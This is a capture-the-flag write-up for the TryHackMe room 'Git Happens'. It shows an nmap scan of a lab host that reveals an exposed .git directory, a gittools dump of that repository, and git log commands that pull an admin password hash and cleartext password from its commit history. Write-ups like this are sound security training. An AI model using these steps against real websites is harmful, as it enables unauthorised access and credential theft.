Information
Room
Name: Git Happens
Profile: tryhackme.com
Difficulty: Easy
Description : Boss wanted me to create a prototype, so here it is! We even used something called "version control" that made deploying this really easy!
Write-up
Overview
Install tools used in this WU on BlackArch Linux:
$ sudo pacman -S nmap gittools
Network enumeration
Nmap service and port enumeration scan:
# Nmap 7.93 scan initiated Mon Apr 10 20:25:51 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap 10.10.47.113
Nmap scan report for 10.10.47.113
Host is up, received reset ttl 63 (0.083s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
| http-git:
| 10.10.47.113:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 10 20:26:25 2023 -- 1 IP address (1 host up) scanned in 34.60 seconds
There is only a web application.
Web discovery
The nmap script http-git
already found there is a git repository exposed.
We can dump it with gittools
.
$ gittools-gitdumper http://10.10.47.113/.git/ git-repo
$ cd git-repo
$ git restore .
Then we can check the history of modifications if there is something juicy.
There are two interesting commits were the password hash of the admin:
$ git log -p d954a99b96ff11c37a558a5d93ce52d0f3702a7d
$ git log -p bc8054d9d95854d278359a432b6d97c27e24061d
There are also two with the password in cleartext:
$ git log -p e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
$ git log -p 395e087334d613d5e423cdf8f7be27196a360459
And that's all, the room was just about finding the password.